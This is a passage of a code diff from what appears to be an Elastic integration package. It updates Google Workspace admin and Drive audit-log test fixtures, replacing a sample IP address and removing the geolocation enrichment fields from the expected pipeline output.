"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MOVE_USER_TO_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOVE_USER_TO_ORG_UNIT", "id": "1", @@ -5617,7 +4465,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5639,35 +4487,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301342500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005166Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD", "id": "1", @@ -5698,7 +4528,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5720,35 +4550,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301344200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RENAME_USER\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005171400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RENAME_USER\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RENAME_USER", "id": "1", @@ -5780,7 +4592,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5804,35 +4616,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301345900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_STRONG_AUTH\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005176800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_STRONG_AUTH\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNENROLL_USER_FROM_STRONG_AUTH", "id": "1", @@ -5869,7 +4663,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5893,35 +4687,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301347700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005182200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "SUSPEND_USER", "id": "1", @@ -5958,7 +4734,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5982,35 +4758,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301349500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005187500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNARCHIVE_USER", "id": "1", @@ -6047,7 +4805,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6071,35 +4829,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301351100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNDELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005192800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNDELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNDELETE_USER", "id": "1", @@ -6136,7 +4876,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6160,35 +4900,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301352800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNSUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005198200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNSUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNSUSPEND_USER", "id": "1", @@ -6225,7 +4947,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6249,35 +4971,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301354500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPGRADE_USER_TO_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005203500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPGRADE_USER_TO_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPGRADE_USER_TO_GPLUS", "id": "1", @@ -6313,7 +5017,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6337,35 +5041,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301356200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"0\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"}]}}", + "ingested": "2021-12-09T13:38:57.005208800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"0\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"}]}}", "provider": "admin", "action": "USERS_BULK_UPLOAD", "id": "1", @@ -6396,7 +5082,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -6420,35 +5106,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301357800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005214200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USERS_BULK_UPLOAD_NOTIFICATION_SENT", "id": "1", diff --git a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log index 3cd073a7379..aa82eee6fe5 100644 --- a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log +++ b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log @@ -1,28 +1,28 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"add_to_folder","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_canceled","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_comment_added","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_requested","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_reviewer_responded","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"create","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"delete","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"download","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"edit","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"add_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"move","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"preview","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"print","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"remove_from_folder","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} 